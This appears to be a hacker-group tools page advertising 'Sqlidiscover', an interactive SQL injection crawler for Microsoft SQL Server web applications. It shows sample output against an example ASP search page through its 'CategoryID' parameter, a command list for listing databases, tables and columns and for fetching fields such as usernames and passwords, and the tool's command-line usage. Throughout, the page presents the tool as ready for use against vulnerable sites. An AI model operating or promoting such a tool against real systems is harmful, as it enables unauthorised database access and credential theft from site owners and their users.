"Never let school get in the way of learning."
-- Mark Twain

[BL4CK] - Tools

Sqlidiscover - MsSQL SQL Injection Data Crawler

sqli_discover_tables v0.21 29Jan2009 kaneda 'n phildo, upgraded by redsand.
[*] HTTP cookie set to ASPSESSIONIDSSSTRCDB=JNLLJILCKOOLFEFNLDOBANFL
[*] URL to process: http://www.example.com/catalog/Search.asp
[*] Abusing 'CategoryID'...

[+] OS version: Windows NT 5.2 (Build 3790: Service Pack 2)
[+] Current user: dbo

unknown_db.table> help
sqliinjection interactive session help

exit / quit - leave sqli
discover databases / discover dbs - discover all databases on system
discover tables - discover all tables on system
discover columns - discover all columns in current table
select db/database [name] - change context to database [name]
select table [name] - change context to table [name]
fetch n,..,x - fetch data from columns n, etc. (i.e. fetch username,password).

... and more...

usage: sqlidiscover [-G|-P] [-v] [-b] [-phostname:port] [-cCookieName:CookieValue] [-avarname1=value1,...,varname2=value2] [-ivarname] URL

-G - use GET method
-P - use POST method
-a - additional variables i.e. -aaction=create,cid=12
-b - bypass SQL, OS version and current user check
-i - variable to screw with i.e. -itxtPassword
-v - verbose
URL - http://vuln/file.asp
-p - use http/https proxy, format hostname:port i.e. -pmyproxy.com:8080
-c - use browser cookie, format name:value i.e. -cASPSESSIONID:LCACPKILKFN

... and more...

